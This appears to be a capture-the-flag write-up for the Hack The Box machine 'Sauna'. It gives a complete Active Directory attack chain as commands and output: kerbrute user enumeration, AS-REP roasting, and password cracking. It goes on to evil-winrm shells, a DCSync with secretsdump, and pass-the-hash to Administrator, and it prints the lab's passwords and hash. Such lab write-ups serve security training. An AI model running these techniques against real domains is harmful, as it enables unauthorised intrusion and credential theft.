Sauna
kerbrute, ASREProast, DCSync
IP
LHOST: 10.10.14.15
RHOST: 10.129.95.180
Nmap
Port scan:
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPsslScript scan:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-10 16:55:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-07-10T16:56:17
|_ start_date: N/A
|_clock-skew: 7h00m00sFull scan:
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49694/tcp open unknown
49719/tcp open unknown
Making a script scan on extra ports: 5985, 9389, 49667, 49673, 49674, 49676, 49694, 49719
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49719/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsPort 445 (crackmapexec)
Enumerate SMB shares with crackmapexec:
crackmapexec smb $IP --sharesHere we learn that the NetBIOS name is sauna and the domain is egotistical-bank.local:
Port 80 (username enumeration)
Recall that crackmapexec found a domain name:
egotistical-bank.localAdd the following entry to /etc/hosts:
10.129.181.201 egotistical-bank.localIn "About Us", we found a list of potential usernames:
Write down a list of possible usernames and save them as users.txt:
fsmith
scoins
hbear
btaylor
sdriverThis [firstname initial][lastname] username pattern is commonly used in HTB boxes. In real world, you may want to generate a list of potential usernames based on emails or company policy.
Port 88 (kerbrute)
Enumerate valid usernames with kerbrute:
kerbrute userenum -d egotistical-bank.local --dc $IP users.txtHere we found a valid username fsmith@egotistical-bank.local:
Update users.txt:
fsmithFoothold (ASREProast)
Now we have a valid username fsmith and we don't know his password. In such scenario, we can try ASREProast in order to get a TGT ticket and crack it offline. To learn the theory behind ASREProast, read the following post:
ASREProast with GetNPUsers:
impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt -dc-ip $IPNote that the / in egotistical-bank.local/ is required, otherwise GetNPUsers won't recognize the string as a domain. It works:
Save the hash to a file named hash.txt:
impacket-GetNPUsers egotistical-bank.local/ -usersfile users.txt -dc-ip $IP -outputfile hash.txtCrack the TGT ticket with John:
john-rockyou hash.txtThe plaintext password is Thestrokes23:
Since port 5985 is open and we have a valid credential fsmith:Thestrokes23, we can get shell with Evil-WinRM:
evil-winrm -i $IP -u fsmith -p Thestrokes23Get a user shell as fsmith:
Lateral Movement (winPEAS)
Upload winPEAS via Evil-WinRM upload command and run it:
cd C:\Windows\Tasks
upload /usr/share/windows-resources/winPEAS/winPEASx64.exe
.\winPEASx64.exewinPEAS found an AutoLogon credential svc_loanmanager:Moneymakestheworldgoround!:
However, the user svc_loanmanager does not exist. Further enumeration shows that there exists a user svc_loanmgr:
Try getting shell with credential svc_loanmgr:Moneymakestheworldgoround! via Evil-WinRM:
evil-winrm -i $IP -u svc_loanmgr -p Moneymakestheworldgoround!Get shell as svc_loanmgr:
Privilege Escalation (DCSync)
Upload adPEAS via Evil-WinRM upload command and run it:
cd C:\Windows\Tasks
upload /usr/share/windows-resources/adPEAS/adPEAS.ps1
. .\adPEAS.ps1
Invoke-adPEASadPEAS found that svc_loanmgr has DCSync rights:
Since we know the credential of svc_loanmgr, we can do DCSync with secretsdump from Kali:
impacket-secretsdump 'egotistical-bank.local/svc_loanmgr:Moneymakestheworldgoround!'@$IPsecretsdump found Administrator's NTLM hash:
The NTLM hash is:
823452073d75b9d1cf70ebdf86c7f98eRecall that Evil-WinRM can do pass the hash, therefore we don't have to crack this hash. Try pass the hash with Evil-WinRM:
evil-winrm -i $IP -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98eGet SYSTEM shell:
Last updated